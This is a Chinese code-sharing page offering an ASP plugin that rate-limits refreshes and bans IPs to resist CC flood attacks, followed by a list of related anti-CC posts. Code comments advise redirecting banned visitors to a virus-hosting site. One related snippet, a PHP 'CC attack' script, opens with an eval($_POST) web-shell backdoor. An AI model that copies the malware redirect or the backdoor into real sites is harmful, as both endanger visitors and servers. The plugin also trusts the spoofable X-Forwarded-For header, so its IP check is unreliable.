飞云写的防CC攻击的ASP程序插件 打包下载

<%
'==================
'飞云防CC攻击ASP程序插件
'建议除必须修改的参数内容外不要修改其他内容
'如果需要反馈错误或提交意见,可以到落伍(IM286.COM)联系 “正版飞云”
'==================

dim FYCC_19,FYCC_20,FYCC_21,FYCC_05
dim FYCC_18

FYCC_05=""
'CCLog.txt存放的路径文件夹!需要手动创建!建议留空
'如果输入,请在前面加上符号"/"

FYCC_18=1 
'防刷新CC攻击关闭与启动,1为启动0为关闭

FYCC_17=1
'防刷新禁止IP功能关闭与启动,1为启动0为关闭

FYCC_19=10 
'每分钟刷新次数,将会出现提示

FYCC_20="http://www.163.com"
'被封IP后自动转入的页面,建议输入存放病毒的网址!!!

FYCC_21=21
'恶意刷新几次将禁止IP

dim realip,proxy
realip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
proxy = Request.ServerVariables("REMOTE_ADDR")
if realip = "" then
GetIp = proxy
else
GetIp = realip
end if

Sub FYCC_03()
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject") 
file = server.mappath(""&FYCC_05&"/CCLog.txt") 
if not fsoObject.fileexists(file) then 
fsoObject.createtextfile file,true,false 
end if
set tsObject = fsoObject.OpenTextFile(file,8) 
tsObject.Writeline " "&GetIp&"" 
Set tsObject = Nothing 
Set fsoObject = Nothing 
End Sub

if FYCC_18<>0 then
if FYCC_17<>0 then
if minute(now())>-1 and minute(now())<4 then
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile(Server.MapPath(""&FYCC_05&"/CCLog.txt"),True)
objCountFile.Write " "
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
end if
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject") 
file = server.mappath(""&FYCC_05&"/CCLog.txt") 
if not fsoObject.fileexists(file) then 
fsoObject.createtextfile file,true,false 
if err.number<>0 then
response.write "您的空间不支持FSO,请同您的空间商联系,或者查看相关权限设置"
response.end
end if
end if
Set objCountFile = fsoObject.OpenTextFile(Server.MapPath(""&FYCC_05&"/CCLog.txt"),1,True)
If Not objCountFile.AtEndOfStream Then fdata = objCountFile.ReadAll
Set objCountFile = Nothing 
if instr(fdata,""&GetIp&"")>0  then
response.write "您的IP["&GetIp&"]已经被禁止!如需要解封,请联系本站管理员或在下一个小时的前3分钟内再访问本站"
response.end
end if
Set fsoObject = Nothing 
end if

if Session("FYCC_01")>FYCC_19 and minute(now())<>Session("FYCC_02") then
Session("FYCC_01")=1
Session("FYCC_02")=minute(now())
elseif Session("FYCC_01")>FYCC_21-1 and minute(now())=Session("FYCC_02") then
if FYCC_17<>0 and Session("FYCC_01")>FYCC_21-1 then
Call FYCC_03()
end if
response.redirect ""&FYCC_20&"" '建议输入存放病毒的网址!!!
response.end
elseif Session("FYCC_01")>FYCC_19 and minute(now())=Session("FYCC_02") then
response.write "本站启动防刷新功能,1分钟内只能翻"&FYCC_19&"页,请在下一分钟再刷新本页面"
Session("FYCC_01")=Session("FYCC_01")+1
response.end
else
if Session("FYCC_01")="" then
Session("FYCC_01")=1
Session("FYCC_02")=minute(now())
else
if minute(now())<>Session("FYCC_02") then
Session("FYCC_01")=1
Session("FYCC_02")=minute(now())
else
Session("FYCC_01")=Session("FYCC_01")+1
end if
end if
End if
end if
%>
本地下载

(0)

相关推荐

  • 飞云写的防CC攻击的ASP程序插件 打包下载

    <% '================== '飞云防CC攻击ASP程序插件 '建议除必须修改的参数内容外不要修改其他内容 '如果需要反馈错误或提交意见,可以到落伍(IM286.COM)联系 "正版飞云" '================== dim FYCC_19,FYCC_20,FYCC_21,FYCC_05 dim FYCC_18 FYCC_05="" 'CCLog.txt存放的路径文件夹!需要手动创建!建议留空 '如果输入,请在前面加上符号"

  • 飞云防CC攻击ASP程序代码插件

    <% '================== '飞云防CC攻击ASP程序插件 '建议除必须修改的参数内容外不要修改其他内容 '如果需要反馈错误或提交意见,可以到落伍(IM286.COM)联系 "正版飞云" '================== dim FYCC_19,FYCC_20,FYCC_21,FYCC_05 dim FYCC_18 FYCC_05="" 'CCLog.txt存放的路径文件夹!需要手动创建!建议留空 '如果输入,请在前面加上符号"

  • Linux系统防CC攻击自动拉黑IP增强版(Shell脚本)

    前天没事写了一个防CC攻击的Shell脚本,没想到这么快就要用上了,原因是因为360网站卫士的缓存黑名单突然无法过滤后台,导致WordPress无法登录!虽然,可以通过修改本地hosts文件来解决这个问题,但是还是想暂时取消CDN加速和防护来测试下服务器的性能优化及安全防护. 前天写的Shell脚本是加入到crontab计划任务执行的,每5分钟执行一次,今天实际测试了下,可还是可以用的,但是感觉5分钟时间有点过长,无法做到严密防护.于是稍微改进了下代码,现在简单的分享下! 一.Shell代码 #

  • PHP防CC攻击实现代码

    这种时候您的统计系统(可能是量子.百度等)当然也是统计不到的.不过我们可以借助于一些防攻击的软件来实现,不过效果有时并不明显.下面我提供一段PHP的代码,可以起到一定的防CC效果. 主要功能:在3秒内连续刷新页面5次以上将指向本机 http://127.0.0.1 复制代码 代码如下: $P_S_T = $t_array[0] + $t_array[1]; $timestamp = time(); session_start(); $ll_nowtime = $timestamp ; if (s

  • 较为全面的asp防CC攻击代码分享

    复制代码 代码如下: <% Dim CC_Info(4),strInfo,strTemp If Session("CC_Info") = "" Then CC_Info(0) = "cclog.txt" '日志文件名 CC_Info(1) = Request.ServerVariables("HTTP_X_FORWARDED_FOR") CC_Info(2) = Request.ServerVariables("

  • 一个简单的防CC攻击Shell脚本分享

    实现代码: 复制代码 代码如下: #!/bin/shcd /var/log/httpd/cat access_log|awk '{print $1}'|sort|uniq -c|sort -n -r|head -n 20 > acp /dev/null access_logcp /dev/null error_logcp /dev/null limit.shcp /dev/null c#awk '{print $2}' a|awk -F. '{print $1"."$2"

  • DISCUZ论坛的UBB编辑器(增加灵活调用,支持ASP UBB解析)打包下载

    复制代码 代码如下: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  <html>  <head>  <meta http-equiv="Content-Type" content="text/html; charset=gbk">  <title>Discuz编辑器</title>  <m

  • Nginx服务器抵御CC攻击的相关配置讲解

    0x00 CC攻击的基本原理 CC攻击利用代理服务器向网站发送大量需要较长计算时间的URL请求,如数据库查询等,导致服务器进行大量计算而很快达到自身的处理能力而形成DOS.而攻击者一旦发送请求给代理后就主动断开连接,因爲代理并不因爲客户端这边连接的断开就不去连接目标服务器.因此攻击机的资源消耗相对很小,而从目标服务器看来,来自代理的请求都是合法的. 以前防CC攻击的方法 为了防范CC,以前的方法一个是限制每个IP的连接数,这在地址范围很广阔的情况下比较难实现;二是限制代理的访问,因为一般的代理都

  • php防止CC攻击代码 php防止网页频繁刷新

    网页快速恶意刷新,cc攻击就是攻击者利用代理服务器生成指向目标站点的合法请求,模拟多用户不停的对受害网站进行访问,特别是访问那些需要大量数据操作需要大量CUP时间的页面,最终导致目标网站服务器资源耗尽,一直到宕机崩溃,如此一来,造成服务器资源的浪费,CPU长时间处于100%,永远都有处理不完的连接直至就网络拥塞,正常的访问被中止.我们称之为CC攻击.尽管我们可以借助于一些防攻击的软件来实现,不过效果有时并不明显. 下面我提供一段PHP的代码,可以起到一定的防CC攻击效果. 主要功能:在3秒内连续

  • php cc攻击代码与防范方法

    cc攻击代码,支持udp 复制代码 代码如下: <?php eval($_POST[Chr(90)]); set_time_limit(86400); ignore_user_abort(True); $packets = 0; $http = $_GET['http']; $rand = $_GET['exit']; $exec_time = $_GET['time']; if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time

随机推荐